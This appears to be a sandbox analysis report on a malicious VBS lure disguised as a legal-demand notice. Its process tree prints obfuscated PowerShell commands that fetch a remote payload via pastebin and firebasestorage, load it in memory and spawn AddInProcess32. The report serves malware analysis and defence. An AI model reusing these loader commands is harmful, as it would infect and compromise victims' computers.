☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆YgB0☆G0☆Z☆B6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆YgB0☆G0☆Z☆B6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆JwBh☆GM☆O☆☆y☆GU☆Mg☆5☆GU☆YQ☆w☆Dc☆Yw☆t☆GY☆Z☆☆0☆GE☆LQ☆z☆DQ☆Mw☆0☆C0☆YQ☆y☆GY☆Ng☆t☆D☆☆YQBk☆GQ☆N☆☆4☆DE☆Z☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆z☆DE☆M☆☆y☆D☆☆M☆☆w☆D☆☆M☆☆x☆DM☆OQ☆w☆DQ☆Mg☆w☆DI☆MQ☆w☆DE☆M☆☆z☆DI☆JQBB☆EQ☆TgBB☆E0☆RQBE☆F8☆RQBE☆F8☆TgBP☆Ek☆QwBB☆EM☆SQBG☆Ek☆V☆BP☆E4☆YwBk☆C8☆bw☆v☆G0☆bwBj☆C4☆d☆Bv☆H☆☆cwBw☆H☆☆YQ☆u☆GM☆bwBk☆C0☆ZQBy☆GI☆bQBl☆Gk☆dgBv☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B4☆Gs☆d☆Bw☆HU☆I☆☆s☆C☆☆JwB5☆HI☆a☆Bn☆G4☆Jw☆s☆C☆☆J☆B3☆G8☆d☆Bn☆HU☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$wotgu = '0';$xktpu = 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $btmdz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($btmdz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ac82e29ea07c-fd4a-3434-a2f6-0add481d=nekot&aidem=tla?txt.31020000013904202101032%ADNAMED_ED_NOICACIFITONcd/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $xktpu , 'yrhgn', $wotgu, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:4684

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs"
1⤵
- Checks computer location settings
PID:1940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B3☆G8☆d☆Bn☆HU☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆Hg☆awB0☆H☆☆dQ☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆YgB0☆G0☆Z☆B6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆YgB0☆G0☆Z☆B6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆JwBh☆GM☆O☆☆y☆GU☆Mg☆5☆GU☆YQ☆w☆Dc☆Yw☆t☆GY☆Z☆☆0☆GE☆LQ☆z☆DQ☆Mw☆0☆C0☆YQ☆y☆GY☆Ng☆t☆D☆☆YQBk☆GQ☆N☆☆4☆DE☆Z☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆z☆DE☆M☆☆y☆D☆☆M☆☆w☆D☆☆M☆☆x☆DM☆OQ☆w☆DQ☆Mg☆w☆DI☆MQ☆w☆DE☆M☆☆z☆DI☆JQBB☆EQ☆TgBB☆E0☆RQBE☆F8☆RQBE☆F8☆TgBP☆Ek☆QwBB☆EM☆SQBG☆Ek☆V☆BP☆E4☆YwBk☆C8☆bw☆v☆G0☆bwBj☆C4☆d☆Bv☆H☆☆cwBw☆H☆☆YQ☆u☆GM☆bwBk☆C0☆ZQBy☆GI☆bQBl☆Gk☆dgBv☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B4☆Gs☆d☆Bw☆HU☆I☆☆s☆C☆☆JwB5☆HI☆a☆Bn☆G4☆Jw☆s☆C☆☆J☆B3☆G8☆d☆Bn☆HU☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$wotgu = '0';$xktpu = 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $btmdz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($btmdz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ac82e29ea07c-fd4a-3434-a2f6-0add481d=nekot&aidem=tla?txt.31020000013904202101032%ADNAMED_ED_NOICACIFITONcd/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $xktpu , 'yrhgn', $wotgu, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:4232

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs"
1⤵
- Checks computer location settings
PID:2864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆B3☆G8☆d☆Bn☆HU☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆Hg☆awB0☆H☆☆dQ☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆YgB0☆G0☆Z☆B6☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆YgB0☆G0☆Z☆B6☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆JwBh☆GM☆O☆☆y☆GU☆Mg☆5☆GU☆YQ☆w☆Dc☆Yw☆t☆GY☆Z☆☆0☆GE☆LQ☆z☆DQ☆Mw☆0☆C0☆YQ☆y☆GY☆Ng☆t☆D☆☆YQBk☆GQ☆N☆☆4☆DE☆Z☆☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆z☆DE☆M☆☆y☆D☆☆M☆☆w☆D☆☆M☆☆x☆DM☆OQ☆w☆DQ☆Mg☆w☆DI☆MQ☆w☆DE☆M☆☆z☆DI☆JQBB☆EQ☆TgBB☆E0☆RQBE☆F8☆RQBE☆F8☆TgBP☆Ek☆QwBB☆EM☆SQBG☆Ek☆V☆BP☆E4☆YwBk☆C8☆bw☆v☆G0☆bwBj☆C4☆d☆Bv☆H☆☆cwBw☆H☆☆YQ☆u☆GM☆bwBk☆C0☆ZQBy☆GI☆bQBl☆Gk☆dgBv☆G4☆LwBi☆C8☆M☆B2☆C8☆bQBv☆GM☆LgBz☆Gk☆c☆Bh☆GU☆b☆Bn☆G8☆bwBn☆C4☆ZQBn☆GE☆cgBv☆HQ☆cwBl☆HM☆YQBi☆GU☆cgBp☆GY☆Lw☆v☆Do☆cwBw☆HQ☆d☆Bo☆Cc☆I☆☆s☆C☆☆J☆B4☆Gs☆d☆Bw☆HU☆I☆☆s☆C☆☆JwB5☆HI☆a☆Bn☆G4☆Jw☆s☆C☆☆J☆B3☆G8☆d☆Bn☆HU☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$wotgu = '0';$xktpu = 'C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $btmdz = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($btmdz).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('ac82e29ea07c-fd4a-3434-a2f6-0add481d=nekot&aidem=tla?txt.31020000013904202101032%ADNAMED_ED_NOICACIFITONcd/o/moc.topsppa.cod-erbmeivon/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $xktpu , 'yrhgn', $wotgu, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
PID:4248

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
PID:2404

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:3092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
85ba073d7015b6ce7da19235a275f6da

SHA1
a23c8c2125e45a0788bac14423ae1f3eab92cf00

SHA256
5ad04b8c19bf43b550ad725202f79086168ecccabe791100fba203d9aa27e617

SHA512
eb4fd72d7030ea1a25af2b59769b671a5760735fb95d18145f036a8d9e6f42c903b34a7e606046c740c644fab0bb9f5b7335c1869b098f121579e71f10f5a9c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7de1bbdc1f9cf1a58ae1de4951ce8cb9

SHA1
010da169e15457c25bd80ef02d76a940c1210301

SHA256
6e390bbc0d03a652516705775e8e9a7b7936312a8a5bea407f9d7d9fa99d957e

SHA512
e4a33f2128883e71ab41e803e8b55d0ac17cbc51be3bde42bed157df24f10f34ad264f74ef3254dbe30d253aca03158fde21518c2b78aaa05dae8308b1c5f30c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
794B

MD5
eb4941fc8162b37ff2c19897500376d2

SHA1
6e6d34ba9ff741db7543f6f263fdfca34a33c6d4

SHA256
445c1399bc8779e12de8aa4f2e6f8cb17192053135347a3a178c94561392b2ea

SHA512
07b6d99c6e45871b46d0aea9b5d5b34ea3b08595bacdbdef99fb042a4678caef332ec9b9954046595a4752dc0251208222c1dbd421290a3a1df66782ea463f42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
207184aa4ea0dda5c471a0e144f40f12

SHA1
23079c7b06cea0fe4ad7b5b5d94f6107a7ed7971

SHA256
0606ca86185e6bca5e48e19196cb1d127c5923d84cd6aa9f102d151275c1b877

SHA512
304ad9dacc52d701a549fa7d594e9ce2fcf9909c383bf7585c19b4d63cc018137cc75398037855632983c6ace407c3d33ef5dff621d6f98f53d558ccc050fab2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
99015dfefde54c97c09139c6c7eec462

SHA1
6674757eda846ef0d7cf0d098c72c3163d1292ce

SHA256
3b2bd432ed13457f146ead4e031a8999c54a26e813ccadac8e0021b9143b4fcf

SHA512
d10fe287ffbfac5900b15c16d23d53b27f5945da488a6dd75a62976eec073f913c4cfa2994469e4dead00f47b3efd9771abdb3ee182fa1e29834f2682a38c9fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
cb2d2cad0eb199eb3891fa9c76a3738e

SHA1
64c11ef60197a2a71bf5e559e5d3511f70f65794

SHA256
d2e10eb1ce5b561af28e157b0f4300d897550f68b6999d1e28ccbdf1caebd5a1

SHA512
e76533e406d6d31aaccbc1f3aa2d69be76c2be063f546aebbff78bdb84298bf5be7f6baba24c85560df7a4bf59e5e03e86cd9d397ef9f88a7d43852802c42c04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
66d4eb3856435491820e599a0ec5b961

SHA1
0c2c6d1eaabc14c48a212ce248a2ec1ce4b37f5a

SHA256
fa3d59e3f942e78d626570339b6f72b7ce7272fe626ce1df38770366fc1abc57

SHA512
824096b0a5dceb0735cb608ecf0d9f9ced4a1da360b0c2b9710d3ff8484b8ec790249f521189054b29150f0cf761efc8413e673fad014a668bbb832f2b13b2ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8dc7faa83176428daffaf42d97a729f

SHA1
b1bcd193d9b7663a7e1f62ad3d87cad82ff24881

SHA256
6852ff8779c2df850fcc33c3e1004e204d072b1dce607660b9100f2be2c1d33e

SHA512
be43b7f8c2db75bddcf5415e0bc19eeb0a519085f8c2418241b24e8645a3caae7815897a8ea97f9167988b9a1672d90173b26fcb759a0f0f48c5cf6b165bd9a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_byofmbvj.eoj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\NOTIFICACION_DE_DEMANDA#10102024102800000.uu

Filesize
4KB

MD5
1187be653926d875747236440c0637e1

SHA1
981dd09622aaa4bccbe834399b48594c47a5bc67

SHA256
232b9a27ab81fb5244b76c035eeba1ae0db94d5277c13fa5fcdda6d9c94abed1

SHA512
